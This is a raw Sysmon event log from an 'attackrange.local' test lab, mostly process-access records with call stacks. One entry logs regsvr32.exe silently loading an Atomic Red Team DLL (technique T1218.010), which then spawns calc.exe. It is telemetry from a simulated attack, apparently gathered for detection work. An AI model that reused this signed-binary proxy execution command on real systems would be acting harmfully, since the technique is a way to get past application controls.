22:12:48.968{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360783Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.968{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360782Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.968{8e433fbf-36df-6013-a303-000000001100}54085592C:\Windows\syswow64\regsvr32.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\wow64.dll+104f8|C:\Windows\System32\wow64.dll+fce0|C:\Windows\System32\wow64.dll+7123|C:\Windows\System32\wow64cpu.dll+1783|C:\Windows\System32\wow64cpu.dll+1199|C:\Windows\System32\wow64.dll+c77a|C:\Windows\System32\wow64.dll+c637|C:\Windows\SYSTEM32\ntdll.dll+d3fb3|C:\Windows\SYSTEM32\ntdll.dll+c1db5|C:\Windows\SYSTEM32\ntdll.dll+71853|C:\Windows\SYSTEM32\ntdll.dll+717fe|C:\Windows\SYSTEM32\ntdll.dll+729bc(wow64)|C:\Windows\System32\KERNELBASE.dll+1092fb(wow64)|C:\Windows\System32\KERNELBASE.dll+1078ac(wow64)|C:\Windows\System32\windows.storage.dll+1f087b(wow64)|C:\Windows\System32\windows.storage.dll+108a12(wow64)|C:\Windows\System32\windows.storage.dll+1048cd(wow64)|C:\Windows\System32\windows.storage.dll+10480a(wow64)|C:\Windows\System32\windows.storage.dll+105ec7(wow64)|C:\Windows\System32\windows.storage.dll+1043ae(wow64)|C:\Windows\System32\windows.storage.dll+108ec2(wow64)|C:\Windows\System32\SHELL32.dll+154218(wow64)|C:\Windows\System32\SHELL32.dll+152fb7(wow64) 154100x8000000000000000360781Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.981{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=0F47684C213A9A4E77E9CB5CD3A1C70D,SHA256=1E09EFA45DB40FE1803E421EF090B82494600CBAD1A5184BE4B7B4158B62B642,IMPHASH=BA072A972FE6C47C8CF7A0347BB0AF7A{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\SysWOW64\regsvr32.exeC:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll 10341000x8000000000000000360780Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.890{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360779Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.890{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360778Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.843{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+2e3b5|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360777Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.843{8e433fbf-2a44-6013-1100-000000001100}11165612C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360776Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.843{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360775Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.577{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360774Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.577{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360773Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360772Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360771Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360770Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360769Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360768Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360767Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360766Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360765Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360764Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360763Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360762Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.530{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032719Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:48.163{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032718Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 